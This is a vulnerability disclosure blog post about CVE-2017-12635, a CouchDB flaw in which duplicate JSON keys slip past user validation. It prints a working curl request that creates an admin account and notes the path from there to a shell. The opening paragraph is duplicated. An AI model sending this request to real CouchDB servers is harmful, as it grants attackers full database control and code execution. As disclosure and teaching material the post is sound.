There was a vulnerability in CouchDB caused by a discrepancy between the database’s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations. I’m wrong, and the main npm registry is unaffected. See correction below. My bad!] [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635) ### Background Last time, I wrote about a deserialization bug leading to [code execution on rubygems.org](https://justi.cz/security/2017/10/07/rubygems-org-rce.html), a repository of dependencies for ruby programs. The ability to inject malware into upstream project dependencies is a scary attack vector, and one from which I doubt most organizations are adequately protected. With this in mind, I started searching for bugs in [registry.npmjs.org](https://registry.npmjs.org/), the...
There was a vulnerability in CouchDB caused by a discrepancy between the database’s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations. I’m wrong, and the main npm registry is unaffected. See correction below. My bad!] [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635) ### Background Last time, I wrote about a deserialization bug leading to [code execution on rubygems.org](https://justi.cz/security/2017/10/07/rubygems-org-rce.html), a repository of dependencies for ruby programs. The ability to inject malware into upstream project dependencies is a scary attack vector, and one from which I doubt most organizations are adequately protected. With this in mind, I started searching for bugs in [registry.npmjs.org](https://registry.npmjs.org/), the server responsible for distributing npm packages. According to [their homepage](https://www.npmjs.com/), the npm registry serves more than 3 billion (!) package downloads per week. ### CouchDB The npm registry uses CouchDB, which I hadn’t heard of before this project. The basic idea is that it’s a “NoSQL” database that makes data replication very easy. It’s sort of like a big key-value store for JSON blobs (“documents”), with features for data validation, querying, and user authentication, making it closer to a full-fledged database. CouchDB is written in Erlang, but allows users to specify document validation scripts in Javascript. These scripts are automatically evaluated when a document is created or updated. They start in a new process, and are passed JSON-serialized documents from the Erlang side. CouchDB manages user accounts through a special database called `_users`. When you create or modify a user in a CouchDB database (usually by doing a `PUT` to `/_users/org.couchdb.user:your_username`), the server checks your proposed change with a Javascript `validate_doc_update` function to ensure that you’re not, for example, attempting to make yourself an administrator. ### Vulnerability The problem is that there is a discrepancy between the Javascript JSON parser (used in validation scripts) and the one used internally by CouchDB, called [jiffy](https://github.com/apache/couchdb-jiffy). Check out how each one deals with duplicate keys on an object like `{"foo":"bar", "foo":"baz"}`: Erlang: ``` > jiffy:decode("{\"foo\":\"bar\", \"foo\":\"baz\"}"). {[{<<"foo">>,<<"bar">>},{<<"foo">>,<<"baz">>}]} ``` Javascript: ``` > JSON.parse("{\"foo\":\"bar\", \"foo\": \"baz\"}") {foo: "baz"} ``` For a given key, the Erlang parser will store both values, but the Javascript parser will only store the last one. Unfortunately, the getter function for CouchDB’s internal representation of the data will only return the first value: ``` % Within couch_util:get_value lists:keysearch(Key, 1, List). ``` And so, we can bypass all of the relevant input validation and create an admin user thusly: ``` curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:oops' --data-binary '{ "type": "user", "name": "oops", "roles": ["_admin"], "roles": [], "password": "password" }' ``` In Erlang land, we’ll see ourselves as having the `_admin` role, while in Javascript land we appear to have no special permissions. Fortunately for the attacker, almost all of the important logic concerning authentication and authorization, aside from the input validation script, occurs the Erlang part of CouchDB. Now that we have an administrator account, we have complete control of the database. Getting a shell from here is usually easy since CouchDB lets you define custom `query_server` languages through the admin interface, a feature which is basically just a wrapper around `execv`. One funny feature of this exploit is that it’s slightly tricky to detect through the web GUI; if you try to examine the user we just created through the admin console, the `roles` field will show up empty since it’s parsed in Javascript before being displayed! ### Impact on npm I’ve been trying to figure out exactly how npm was affected by this bug. Since I didn’t actually exploit the vulnerability against any of npm’s production servers, I have to make educated guesses about which parts of the infrastructure were vulnerable to which parts of the attack, based on publicly available information.It turns out that registry.npmjs.org simply exposes an identical API to the CouchDB user creation flow in order to maintain backwards compatibility with old clients. It has been using a custom authentication system since early 2015, and is therefore not vulnerable to my attack. The skim database mentioned below was affected by the bug, however. I apologize for being completely wrong in the initial version of this blog post! Npm also exposes a “[skim database](https://skimdb.npmjs.com/)” which does look like it would have been vulnerable to the RCE part of the attack, but it’s unclear to me how that database is used in the infrastructure today. There’s a [blog post from 2014](http://blog.npmjs.org/post/75707294465/new-npm-registry-architecture) which indicates that all writes go to the skimdb, but I don’t know if this is still true. ### Conclusion It’s probably a bad idea to use more than one parser to process the same data. If you have to, perhaps because your project uses multiple languages like in CouchDB, do your best to ensure that there aren’t any functional differences between the parsers like there were here. It’s unfortunate that the JSON standard [does not specify the behavior of duplicate keys](https://stackoverflow.com/questions/21832701/does-json-syntax-allow-duplicate-keys-in-an-object/21833017#21833017). Thanks to the CouchDB team for having a published security@ email address and working quickly to get this fixed. ### Shameless plug If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider [joining Mastodon!](https://joinmastodon.org/) It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!